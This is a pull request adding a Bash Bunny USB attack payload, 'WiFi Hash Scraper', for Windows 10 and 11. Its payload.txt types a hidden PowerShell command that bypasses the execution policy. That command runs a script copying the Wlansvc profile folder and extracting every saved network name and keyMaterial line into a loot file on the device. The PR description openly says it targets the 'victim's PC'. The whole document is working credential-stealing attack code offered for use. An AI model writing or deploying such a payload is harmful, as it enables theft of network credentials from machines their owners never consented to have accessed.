### PR TITLE
WiFi Hash Scraper

### DIFF
--- a/payloads/library/recon/WiFi-Hash-Scraper/Get-Hashes.ps1
+++ b/payloads/library/recon/WiFi-Hash-Scraper/Get-Hashes.ps1
@@ -1,0 +1,22 @@
+﻿#Wi-Fi Information Scraper
+cd "~";
+$tDate = Get-Date -Format "MM-dd-yyyy";
+$vol = Get-Volume -FileSystemLabel BashBunny;
+$baseDir = $vol.DriveLetter + ":/loot/WiFi-Hash-Scraper/" + $tDate;
+$interfaceDir = $baseDir + "/Interfaces";
+$oFile = $baseDir + "/WiFi-Info.txt";
+Copy-Item "C:/ProgramData/Microsoft/Wlansvc/Profiles/Interfaces" "$interfaceDir" -R -Force;
+cd $interfaceDir;
+$temp = Get-ChildItem | Select-String "{";
+$interfaces = $temp -split "[Environment]::NewLine";
+foreach($iface in $interfaces){
+    cd $iface;
+    $ftemp = Get-ChildItem;
+    $files = $ftemp -split "[Environment]::NewLine";
+    foreach($sNet in $files){
+        $temp = cat "$sNet" | Select-String "name";$temp += "";$temp += cat $sNet | Select-String "keyMaterial";echo $temp | Out-File $oFile -Append
+    }
+    cd ../;
+}
+cd "~";
+Remove-Item $interfaceDir -R;

--- a/payloads/library/recon/WiFi-Hash-Scraper/payload.txt
+++ b/payloads/library/recon/WiFi-Hash-Scraper/payload.txt
@@ -15,7 +15,7 @@ ATTACKMODE HID STORAGE
 LED SETUP
 GET SWITCH_POSITION
 LED ATTACK
-RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel 'BashBunny').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')"
+RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel '${BB_LABEL}').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')"
 Q DELAY 250
 Q ENTER
 Q DELAY 3000

--- a/payloads/library/recon/WiFi-Hash-Scraper/payload.txt
+++ b/payloads/library/recon/WiFi-Hash-Scraper/payload.txt
@@ -1,0 +1,22 @@
+#!/bin/bash
+#
+# Title:            Wi-Fi Hash Scraper
+#
+# Description:      
+# 			  Copies all of the known / saved WiFi password hashes from the victim's PC to the BashBunny's loot folder.
+#
+# Author:           KryptoKola
+# Version:          1.0
+# Category:         Recon
+# Target:           Microsoft Windows 10 & 11
+
+ATTACKMODE HID STORAGE
+
+LED SETUP
+GET SWITCH_POSITION
+LED ATTACK
+RUN WIN "powershell -Noni -NoP -W h -EP Bypass iex((Get-Volume -FileSystemLabel 'BashBunny').DriveLetter+':\payloads\\$SWITCH_POSITION\Get-Hashes.ps1')"
+Q DELAY 250
+Q ENTER
+Q DELAY 3000
+LED FINISH

--- a/payloads/library/recon/WiFi-Hash-Scraper/payload.txt
+++ b/payloads/library/recon/WiFi-Hash-Scraper/payload.txt
@@ -11,6 +11,7 @@
 # Target:           Microsoft Windows 10 & 11
 
 ATTACKMODE HID STORAGE
+GET BB_LABEL
 
 LED SETUP
 GET SWITCH_POSITION


### PR DESCRIPTION
Scrapes and saves all the known network / wifi hashes on the victims pc to the loot folder of the bash bunny